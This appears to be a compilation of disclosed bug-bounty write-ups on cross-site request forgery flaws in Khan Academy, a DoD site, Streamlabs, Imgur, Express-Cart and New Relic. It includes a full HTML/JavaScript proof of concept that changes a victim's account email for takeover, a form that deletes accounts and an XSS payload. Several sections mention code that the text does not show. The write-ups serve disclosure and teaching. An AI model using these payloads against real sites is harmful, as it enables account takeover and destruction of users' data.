Researcher discovered that an account with an unconfirmed email address can be taken over by triggering a CSRF on the /signup/email API endpoint.
The PoC exploit code below sends an HTTP POST request when the HTML is loaded in a web browser. When the Window loads it triggers the event listener on line 28 which forms and sends the HTTP POST request with the email attacker@rapidlight.io to the API endpoint https://www.khanacademy.org/signup/email. The withCredentials flag is set to true on the XMLHttpRequest object on line 32. This flag:
indicates whether or not cross-site Access-Control requests should be made using credentials such as cookies, authorization headers or TLS client certificates.
-Mozilla
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Khan Academy Signup Email CSRF PoC</title>
<style type="text/css">
body {
display:flex;
flex-direction:column;
justify-content:center;
min-height:100vh;
margin:0;
}
p {
display:flex;
align-self:center;
font-size:0.8rem;
font-family:sans-serif;
font-weight:bold;
text-transform:uppercase;
letter-spacing:0.1rem;
}
</style>
</head>
<body>
<p>Khan Academy Signup Email CSRF PoC</p>
<script type="text/javascript">
window.addEventListener('load', function(e) {
var attacker_addr = 'attacker@rapidlight.io';
var x = new XMLHttpRequest();
x.open('POST', 'https://www.khanacademy.org/signup/email', true);
x.withCredentials = true;
x.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
x.send('email=' + encodeURIComponent(attacker_addr));
}, false);
</script>
</body>
</html>
Upon visiting the attacker controlled website which contains the code above, the victim's browser will send the HTTP POST request with the changed email to the api endpoint changing their user's legitimate email to the attacker controlled email address. Once the email address has been changed to the attacker controlled email address, a password reset with the new email allows for full account compromise.
Researcher provided PoC:
DoD - Account Deletion
Researcher discovered endpoint which contains a CSRF vulnerability that allows an attacker to delete a victims account. The endpoint <unknownDoDwebsite>/services/user/closeAccount does not have CSRF protections in place, getting a victim to open a website in the same browser with the code below will delete the victims user account.
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="████████/services/user/closeAccount" method="POST"> <input type="submit" value="Submit request" /> </form> </body> </html>
Streamlabs - Remove User Donation Info
Researcher discovered that the endpoint to modify user donation settings does not properly implement CSRF mitigations.
Original HTTP POST request with X-CSRF and X-XSRF headers removed (as they were not validated server-side).
Now that the donation info has been removed, validate it by visiting the donation_settings URL visited previously:
HTTP/1.1 200 OK
Date: Thu, 03 Dec 2020 02:48:11 GMT
Content-Type: application/json
Content-Length: 15
Connection: close
{"settings":[]}
Researcher provided PoC:
Imgur - CSRF and Self-XSS
Researcher discovered combined self-XSS and CSRF attack that can be used to conduct a XSS attack on any user who visits a malicious website while logged into Imgur in the same browser.
The exploit HTML code creates a favorites folder with the XSS payload
New Test"><img src=x onerror=prompt(2)>
Once the user visits the malicious website hosting the HTML code below, the code sends the request to Imgur to create a favorites folder for the authenticated user with the Self-XSS payload.
The Node.js Express-Cart module is a fully functional shopping cart. Researcher discovered admin endpoint that creates discounts does not have CSRF protections in place. The PoC HTML code below creates a 30% discount code that could be used throughout the application.
Exploit CSRF HTML code creates a new role using HTTP POST request on endpoint https://user-management.service.newrelic.com/accounts/2260599/roles with the role name of CSRF_ROLE.
Visiting the roles page https://account.newrelic.com/accounts/<account_id>/roles shows the newly created role after exploit code executes in the victims browser .
